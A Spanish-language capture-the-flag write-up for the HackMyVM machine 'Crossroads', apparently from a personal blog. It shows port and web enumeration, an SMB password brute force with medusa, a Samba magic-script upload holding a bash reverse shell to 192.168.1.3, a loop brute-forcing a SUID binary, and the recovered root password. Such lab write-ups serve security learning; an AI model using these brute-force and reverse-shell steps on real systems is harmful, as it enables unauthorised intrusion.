cd ~/blog

~/writeups/hmv/078-crossroads.md

078 - Crossroads

easy Linux hmv 21-04-2024
SMB user enumeration + brute forceSamba magic script RCESUID binary password brute force
hackmyvm.eu/machines/machine.php?vm=Crossroads

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.20
 nmap -sCV -p80,139,445 -oN 02-targeted.txt 192.168.1.20
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-21 17:03 -04
Nmap scan report for 192.168.1.20
Host is up (0.00028s latency).

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  oOV      Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CROSSROADS
...
 gobuster dir -u 'http://192.168.1.20' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/note.txt             (Status: 200) [Size: 108]
/crossroads.png       (Status: 200) [Size: 1100255]
...

 cat note.txt
 just find three kings of blues
 then move to the crossroads
 -------------------------------
 -abuzerkomurcu

Enumeramos SMB con enum4linux y descubrimos el usuario albert:

 enum4linux -a 192.168.1.20
...
user:[albert] rid:[0x3e9]
...

Hacemos fuerza bruta con medusa:

 medusa -u albert -P ~/Documentos/wordlists/rockyou.txt -h 192.168.1.20 -M smbnt
...
ACCOUNT FOUND: [smbnt] Host: 192.168.1.20 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)]
...

Listamos los recursos compartidos y, en el home de albert, encontramos un smbshare con un smb.conf que define una magic script:

 smbclient //192.168.1.20/albert -U albert
smb: \> ls
  smbshare                            D        0  Tue Mar  2 19:16:13 2021
  crossroads.png                      N  1583196  Tue Mar  2 19:34:03 2021
  beroot                              N    16664  Tue Mar  2 20:02:41 2021
  user.txt                            N       32  Tue Mar  2 20:15:18 2021
 cat smb.conf
...
[smbshare]
path = /home/albert/smbshare
valid users = albert
writable = yes
magic script = smbscript.sh
...

Subimos un smbscript.sh malicioso al recurso; al cerrarse, Samba lo ejecuta y obtenemos una shell:

 cat smbscript.sh
#!/bin/bash

bash -i >& /dev/tcp/192.168.1.3/1234 0>&1

 smbclient //192.168.1.20/smbshare -U albert
smb: \> put smbscript.sh

 ncat -nlvp 1234
Ncat: Connection from 192.168.1.20:48236.
bash: cannot set terminal process group (763): Inappropriate ioctl for device
bash: no job control in this shell
albert@crossroads:/home/albert/smbshare$

Obtenemos la primera flag. En el home hay una crossroads.png distinta de la descargada; la procesamos con stegoveritas y obtenemos un wordlist:

 stegoveritas crossroads.png

También hay un binario SUID beroot que pide una contraseña. Probamos el wordlist con un bucle:

albert@crossroads:/home/albert$ for PASSWD in $(cat wordlist.txt); do echo $PASSWD >> tmp; echo $PASSWD | ./beroot >> tmp; done

albert@crossroads:/home/albert$ cat tmp
...
lemuel
enter password for root
-----------------------

do ls and find root creds
...

La contraseña correcta genera un rootcreds con la contraseña de root:

albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___

albert@crossroads:/home/albert$ su root
Password: ___drifting___
id
uid=0(root) gid=0(root) groups=0(root)

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados